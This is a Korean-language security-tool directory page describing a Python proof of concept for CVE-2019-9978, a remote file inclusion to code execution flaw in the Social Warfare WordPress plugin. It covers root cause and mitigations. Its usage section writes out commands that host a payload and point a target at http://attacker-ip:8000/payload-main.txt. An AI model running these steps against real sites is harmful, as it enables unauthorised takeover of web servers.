Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2019-9978-RCE-PoC — CVE 2019-9978 (Social Warfare 플러그인)의 근본 원인 분석 및 익스플로잇을 보여주는 맞춤형 Python 개념 증명으로,실용적인 RFI에서 RCE로 이어지는 공격 흐름에 중점을 둡니다. | Kitploit
도구/GitHubGitHub/vaidehim55/cve-2019-9978-rce-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubvaidehim55/cve-2019-9978-rce-poc

CVE-2019-9978-RCE-PoC

CVE 2019-9978 (Social Warfare 플러그인)의 근본 원인 분석 및 익스플로잇을 보여주는 맞춤형 Python 개념 증명으로,실용적인 RFI에서 RCE로 이어지는 공격 흐름에 중점을 둡니다.

저장소 보기
118개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2019-9978 RCE PoC – Social Warfare WordPress 플러그인 익스플로잇

인증되지 않은 원격 파일 포함(RFI)을 통한 원격 코드 실행(RCE)


📌 설명

이 저장소는 Social Warfare WordPress 플러그인의 중요한 취약점인 CVE-2019-9978 악용을 시연하는 Python 기반 PoC를 포함합니다.

이 취약점은 인증되지 않은 공격자가 **원격 파일 포함(RFI)**을 수행할 수 있게 하며, 공격자 제어 서버에서 악성 페이로드를 호스팅하여 *원격 코드 실행(RCE)*로 확대될 수 있습니다.

이 PoC는 교육 및 승인된 보안 테스트 목적으로만 통제된 WordPress 실습 환경에서 개발 및 테스트되었습니다.


🔍 취약점 요약

| CVE 식별자: | CVE-2019-9978 | | 영향받는 구성 요소: | Social Warfare (WordPress 플러그인) | | 영향받는 버전: | ≤ 3.5.2 | | 취약점 유형: | Remote File Inclusion (RFI) | | 영향: | Remote Code Execution (RCE) | | 인증 필요: | No | | 공격 벡터: | Remote | | 심각도: | Critical |


🧠 근본 원인 분석

Social Warfare 플러그인이 원격 콘텐츠 포함에 사용되는 사용자 입력의 유효성 검사 및 삭제를 제대로 수행하지 못합니다.
그 결과, 공격자는 악성 외부 URL을 제공하여 인증되지 않은 원격 파일 포함이 가능합니다.

포함된 원격 파일에 실행 가능한 PHP 코드가 포함되어 있으면 WordPress 서버 컨텍스트에서 실행되어 이 발생합니다.

원격 코드 실행

🔄 공격 흐름

root@kitploit:~
인증되지 않은 HTTP 요청
↓
원격 파일 포함 (외부 URL)
↓
악성 페이로드 실행
↓
원격 코드 실행 (RCE)

🧪 PoC (개념 증명)

  1. 공격자가 악성 페이로드를 외부 HTTP 서버에 호스팅합니다
  2. 취약한 Social Warfare 엔드포인트가 원격 파일을 포함합니다
  3. 페이로드가 대상 WordPress 서버에서 실행됩니다
  4. 공격자가 원격 명령 실행에 성공합니다
  5. 익스플로잇 스크립트가 테스트 및 연구 목적으로 이 과정을 자동화합니다

▶️ 사용법

1단계: 페이로드 호스팅

root@kitploit:~
python3 -m http.server 8000

페이로드 파일(예: payload-main.txt)을 서버 디렉토리에 배치하십시오.


2단계: 익스플로잇 실행

root@kitploit:~
python3 exploit.py <target-site.com> http://attacker-ip:8000/payload-main.txt

🛠 요구 사항

  • Python 3.x
  • 취약한 버전의 Social Warfare WordPress 플러그인
  • WordPress 테스트 환경
  • 페이로드 호스팅을 위한 로컬 또는 원격 HTTP 서버

🛡 완화 및 방어

  • Social Warfare 플러그인을 패치된 버전으로 업데이트

  • 원격 파일 포함 비활성화:

    root@kitploit:~
    allow_url_include = Off
    
  • WordPress 플러그인의 외부 URL 처리를 제한

  • RFI 탐지 규칙이 포함된 웹 애플리케이션 방화벽(WAF) 배포


⚠️ 법적 고지

이 프로젝트는 교육 목적 및 승인된 보안 테스트만을 위해 엄격하게 제공됩니다.

명시적 허가 없이 이 PoC를 시스템에 사용하지 마십시오.
저자는 이 도구의 오용이나 손해에 대해 책임을 지지 않습니다.


🔗 참조 및 출처

  • 원본 연구자: Luka Sikic
  • 원본 PoC 참조: https://github.com/hash3liZer/CVE-2019-9978
  • 제작자 / 각색: Vaidehi Muluru
도구 다운로드